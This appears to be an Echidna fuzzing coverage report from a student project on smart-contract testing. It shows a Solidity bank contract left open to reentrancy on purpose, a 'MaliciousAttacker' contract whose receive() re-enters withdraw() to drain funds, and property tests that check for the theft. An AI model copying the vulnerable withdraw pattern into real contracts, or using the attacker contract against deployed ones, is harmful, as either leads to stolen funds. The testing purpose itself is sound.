/home/ali/TFG/pruebas-echidna/contracts/VulnerableBank.sol
  1 |     | // SPDX-License-Identifier: UNLICENSED
  2 |     | pragma solidity ^0.8.13;
  3 |     | 
  4 |     | contract VulnerableBank {
  5 |     |     mapping(address => uint256) public balances;
  6 |     | 
  7 |     |     function deposit() public payable {
  8 |     |         balances[msg.sender] += msg.value;
  9 |     |     }
 10 |     | 
 11 |     |     function withdraw() public {
 12 |     |         uint256 balance = balances[msg.sender];
 13 |     |         require(balance > 0, "Insufficient balance");
 14 |     | 
 15 |     |         // Enviar la cantidad retirada al llamador (vulnerable a reentrancy)
 16 |     |         (bool success, ) = msg.sender.call{value: balance}("");
 17 |     |         require(success, "Transfer failed");
 18 |     | 
 19 |     |         balances[msg.sender] = 0;
 20 |     |     }
 21 |     | }

/home/ali/TFG/pruebas-echidna/echidna/ReentrancyEchidnaTest.sol
  1 |     | // SPDX-License-Identifier: UNLICENSED
  2 |     | pragma solidity ^0.8.13;
  3 |     | 
  4 |     | import "../contracts/VulnerableBank.sol";
  5 |     | 
  6 |     | contract MaliciousAttacker {
  7 |     |     VulnerableBank public bank;
  8 |     |     uint256 public stolen;
  9 |     | 
 10 |     |     constructor(address _target) {
 11 |     |         bank = VulnerableBank(_target);
 12 |     |     }
 13 |     | 
 14 |     |     function deposit() external payable {
 15 |     |         bank.deposit{value: msg.value}();
 16 |     |     }
 17 |     | 
 18 |     |     function attack() external {
 19 |     |         bank.withdraw();
 20 |     |     }
 21 |     | 
 22 |     |     receive() external payable {
 23 |     |         stolen += msg.value;
 24 |     |         if (address(bank).balance > 0) {
 25 |     |             bank.withdraw();
 26 |     |         }
 27 |     |     }
 28 |     | }
 29 |     | 
 30 | *r  | contract ReentrancyEchidnaTest {
 31 |     |     constructor() payable {}
 32 |     | 
 33 |     |     // ✅ PROP 1: Banco nunca debe quedar vacío
 34 |     |     function echidna_bank_balance_nonzero() public payable returns (bool) {
 35 |     |         VulnerableBank bank = new VulnerableBank();
 36 |     |         MaliciousAttacker attacker = new MaliciousAttacker(address(bank));
 37 |     |         
 38 |     |         // FUZZING: Echidna probará CUALQUIER valor >=1 wei
 39 |     |         bank.deposit{value: 1000}();
 40 |     |         attacker.deposit{value: 100}();
 41 |     |         attacker.attack();
 42 |     |         
 43 |     |         return address(bank).balance > 0;
 44 |     |     }
 45 |     |     
 46 |     |     // ✅ PROP 2: Attacker no puede robar más de su depósito
 47 |     |     function echidna_attacker_balance_limit() public payable returns (bool) {
 48 |     |         VulnerableBank bank = new VulnerableBank();
 49 |     |         MaliciousAttacker attacker = new MaliciousAttacker(address(bank));
 50 |     |         
 51 |     |         bank.deposit{value: 1000}();
 52 |     |         uint256 attackerDeposit = 100;
 53 |     |         attacker.deposit{value: attackerDeposit}();
 54 |     |         attacker.attack();
 55 |     |         
 56 |     |         return attacker.stolen() <= attackerDeposit;
 57 |     |     }
 58 |     | }

